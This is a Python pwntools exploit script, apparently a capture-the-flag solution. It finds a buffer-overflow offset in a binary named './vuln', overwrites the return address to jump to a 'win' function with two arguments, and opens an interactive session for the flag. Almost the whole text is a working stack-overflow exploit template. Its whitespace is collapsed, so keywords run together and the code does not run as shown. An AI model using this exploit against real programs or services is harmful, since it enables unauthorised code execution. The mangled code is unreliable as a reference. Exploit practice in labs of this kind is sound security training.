from pwn import*# Allows you to switch between local/GDB/remote from terminaldefstart(argv=[],*a,**kw):if args.GDB:# Set GDBscript belowreturn gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)elif args.REMOTE:# ('server', 'port')returnremote(sys.argv[1], sys.argv[2], *a, **kw)else:# Run locallyreturnprocess([exe] + argv, *a, **kw)# Find offset to EIP/RIP for buffer overflowsdeffind_ip(payload):# Launch process and send payload p =process(exe, level='warn') p.sendlineafter(b':', payload)# Wait for the process to crash p.wait()# Print out the address of EIP/RIP at the time of crashing ip_offset =cyclic_find(p.corefile.pc)# x86# ip_offset = cyclic_find(p.corefile.read(p.corefile.sp, 4)) # x64warn('located EIP/RIP offset at {a}'.format(a=ip_offset))return ip_offset# Specify your GDB script here for debugginggdbscript ='''init-pwndbgcontinue'''.format(**locals())# Set up pwntools for the correct architectureexe ='./vuln'# This will automatically get context arch, bits, os etcelf = context.binary =ELF(exe, checksec=False)# Change logging level to help with debugging (error/warning/info/debug)context.log_level ='debug'# ===========================================================# EXPLOIT GOES HERE# ===========================================================io =start()# Pass in pattern_size, get back EIP/RIP offsetoffset =find_ip(cyclic(128))payload =flat(b'A'* offset, elf.symbols.win,0x0, # junk for saved RBP0xCAFEF00D,0xF00DF00D)# Save the payload to filewrite('payload', payload)# Send the payloadio.sendlineafter(b':', payload)# Receive the flagio.interactive()
